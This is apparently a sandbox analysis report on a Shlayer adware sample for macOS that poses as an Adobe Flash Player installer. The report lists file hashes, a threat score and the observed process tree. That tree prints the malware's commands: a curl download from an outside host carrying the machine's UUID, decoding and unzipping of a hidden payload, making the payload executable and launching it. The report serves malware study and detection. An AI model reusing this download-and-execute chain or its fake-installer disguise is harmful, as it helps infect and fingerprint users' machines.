shlayer | 852ff1b97c1155fc28b14f5633a17de02dcace17bdc5aadf42e2f60226479eaf | Triage

Submit
Reports

Overview

overview

Static

static

Shlayer.dmg

macos_amd64

Analysis

max time network
157s
platform
macos_amd64
resource
macos
submitted
24-06-2021 12:56

Sharing

Static task

static1

Behavioral task

behavioral1

Sample

Shlayer.dmg

Resource

macos

macos_amd64

0 signatures

0 seconds

Report Analysis Logs

General

Target

Shlayer.dmg
Size

244KB
MD5

b2b519602673e27aa40085deb8827bd1
SHA1

e827f4c1a1790c13cd761cdbf31cd2c0d7b25e55
SHA256

852ff1b97c1155fc28b14f5633a17de02dcace17bdc5aadf42e2f60226479eaf
SHA512

a635290927f22d4ba578d2afa05e0c27542fbdb1317e0fd829496966a315e9d16cf71302361a76d4acd2880c199bdd47eb8a10ff51b0b1a7f2cfbb6427adf029

Score

10^/10

shlayer adware

Malware Config

Signatures

Shlayer
Shlayer family.
adware shlayer

Processes

/bin/sh
sh -c "sudo open /Volumes/AdobeFlashPlayer/AdobeFlashPlayer_567.app"
1⤵
PID:509

/bin/bash
sh -c "sudo open /Volumes/AdobeFlashPlayer/AdobeFlashPlayer_567.app"
1⤵
PID:509

/usr/bin/sudo
sudo open /Volumes/AdobeFlashPlayer/AdobeFlashPlayer_567.app
1⤵
PID:509
- /usr/bin/open
  open /Volumes/AdobeFlashPlayer/AdobeFlashPlayer_567.app
  2⤵
  PID:510

/Volumes/AdobeFlashPlayer/AdobeFlashPlayer_567.app/Contents/MacOS/LYwjtu0sc3XqkNVbQe_gM4YiRpmgUpRIew
/Volumes/AdobeFlashPlayer/AdobeFlashPlayer_567.app/Contents/MacOS/LYwjtu0sc3XqkNVbQe_gM4YiRpmgUpRIew
1⤵
PID:512
- /usr/bin/dirname
  dirname /Volumes/AdobeFlashPlayer/AdobeFlashPlayer_567.app/Contents/MacOS/LYwjtu0sc3XqkNVbQe_gM4YiRpmgUpRIew
  2⤵
  PID:513
- /usr/bin/dirname
  dirname /Volumes/AdobeFlashPlayer/AdobeFlashPlayer_567.app/Contents/MacOS
  2⤵
  PID:514
- /usr/bin/curl
  curl -f0L "http://api.macfantsy.com/sd/?c=q2BybQ==&u=C589348B-0863-5695-96A0-3DAE1B1C0B90&s=178FAAD3-6EEC-4A49-80E4-5AE9FA757182&o=10.15.1&b=2833846567"
  2⤵
  PID:1413
- /usr/bin/unzip
  unzip -P 76564833825112833846567 /tmp/5bR1sgnKw -d /tmp/j9tx5Bwa/
  2⤵
  PID:1416
- /bin/rm
  rm -f /tmp/5bR1sgnKw
  2⤵
  PID:1417
- /bin/chmod
  chmod +x "/tmp/j9tx5Bwa//Contents/MacOS/*"
  2⤵
  PID:1425
- /usr/bin/open
  open -a /tmp/j9tx5Bwa/ --args s 178FAAD3-6EEC-4A49-80E4-5AE9FA757182 /Volumes/AdobeFlashPlayer
  2⤵
  PID:1426

/usr/bin/openssl
openssl enc -base64 -d -aes-256-cbc -nosalt -pass pass:2833846567
1⤵
PID:517

/usr/bin/base64
base64 --decode /dev/fd/63
1⤵
PID:521

/usr/bin/xxd
xxd -pu /dev/fd/63
1⤵
PID:524

/usr/bin/xxd
xxd -r -p /dev/fd/63
1⤵
PID:527

/usr/bin/sw_vers
sw_vers -productVersion
1⤵
PID:1401

/usr/bin/uuidgen
uuidgen
1⤵
PID:1403

/usr/bin/tr
tr -dc "[[:print:]]"
1⤵
PID:1406

/usr/sbin/ioreg
ioreg -rd1 -c IOPlatformExpertDevice
1⤵
PID:1408

/usr/bin/grep
grep -o "\"IOPlatformUUID\" = \"\\(.*\\)\""
1⤵
PID:1409

/usr/bin/sed
sed -E -n "s@.*\"([^\"]+)\"@\\1@p"
1⤵
PID:1410

/usr/bin/mktemp
mktemp /tmp/XXXXXXXXX
1⤵
PID:1412

/usr/bin/mktemp
mktemp -d /tmp/XXXXXXXX
1⤵
PID:1415

/usr/bin/grep
grep -m1 -v "*.app" /dev/fd/63
1⤵
PID:1420

/bin/ls
ls -1 /tmp/j9tx5Bwa/
1⤵
PID:1421

/usr/bin/sed
sed -E -n "s@^(/Volumes/[^/]+)/.*@\\1@p"
1⤵
PID:1424

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

© 2018-2024

Terms | Privacy